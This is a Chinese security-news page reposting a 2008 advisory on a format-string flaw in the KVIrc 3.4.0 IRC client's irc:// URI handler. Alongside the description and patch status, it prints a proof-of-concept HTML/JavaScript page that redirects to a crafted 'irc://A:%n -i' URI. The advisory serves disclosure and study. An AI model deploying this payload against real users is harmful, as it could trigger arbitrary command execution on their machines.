中文版 | ENGLISH | 韩文
旗下网站:梦网手机
首页 | 安全资讯 | 企业热线 | 软件下载 | 安全保姆 | 关于我们 | 论坛
HKC安全网软件公告
红客中国自主开发的红客网警系列软件将在10月隆重上市,敬请关注。(红客中国反入侵精灵将暂时停止下载)
   
   
   
   
首页 > 安全资讯 > 漏洞公告
KVIrc URI处理器远程格式串处理漏洞
发布日期:2008-10-28 14:16:26      共阅0次
  受影响系统:
KVIrc KVIrc 3.4.0
描述:
BUGTRAQ  ID: 31912

KVIrc是基于Qt GUI工具包的免费可移植IRC客户端。

KVIrc在处理URI时存在格式串漏洞,如果将KVIrc设置为默认的IRC URI处理器的话,则用户受骗跟随了特制的irc:// URI就会导致执行任意指令。

<*来源:Gjoko Krstic (liquidworm@gmail.com
  
  链接:http://secunia.com/advisories/32410/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>

<title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</Title>

<head>

<body>

<center> <br /> <br /> <strong>Warning ! :)</strong> </center>

<body bgcolor="#FFFF00">

<script type="text/javascript">

alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");

function poc()
{
    window.location.href = "irc://A:%n -i";
}

var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (answ == true)
{
    poc();
}

    else
    {
        window.location.href = "http://www.kvirc.net";
    }

</script> </body> </head> </html>

建议:
厂商补丁:

KVIrc
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.kvirc.net/

Copyright ◎ 2004 - 2008 红客中国安全网版权所有